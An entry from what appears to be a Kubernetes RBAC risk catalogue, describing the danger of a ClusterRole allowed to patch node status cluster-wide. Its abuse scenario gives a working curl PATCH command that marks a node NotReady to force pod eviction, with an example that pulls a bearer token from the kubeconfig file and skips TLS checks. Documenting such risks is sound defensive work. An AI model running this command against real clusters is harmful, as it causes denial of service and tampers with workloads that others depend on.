Patch node status cluster-wide
Tampering
High
Overview
| Field | Value |
|---|---|
| ID | 1069 |
| Name | Patch node status cluster-wide |
| Risk Category | Tampering |
| Risk Level | High |
| Role Type | ClusterRole |
| API Groups | core |
| Resources | nodes/status |
| Verbs | patch, update |
| Tags | DenialOfService NodeManipulation SchedulingAbuse Tampering |
Description
Allows patching the status of any node in the cluster. This can be abused to mark nodes as (un)healthy or (un)schedulable, impacting workload scheduling, potentially tricking controllers, or causing denial of service.
Abuse Scenarios
- Patch a node’s status to mark it as ‘NotReady’, causing pods to be evicted.
# Replace <kubernetes-api-server> with your API server address
# Replace <token> with your authentication token
curl -k -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -X PATCH \
--data '{"status":{"conditions":[{"type":"Ready","status":"False","reason":"KubeletStopped","message":"Kubelet stopped posting node status."}]}}' \
https://<kubernetes-api-server>/api/v1/nodes/<node-name>/status
# Example: curl -k -H "Authorization: Bearer $(cat ~/.kube/config | grep token: | awk '{print $2}')" -H "Content-Type: application/json" -X PATCH --data '{"status":{"conditions":[{"type":"Ready","status":"False","reason":"KubeletStopped","message":"Kubelet stopped posting node status."}]}}' https://127.0.0.1:6443/api/v1/nodes/minikube/status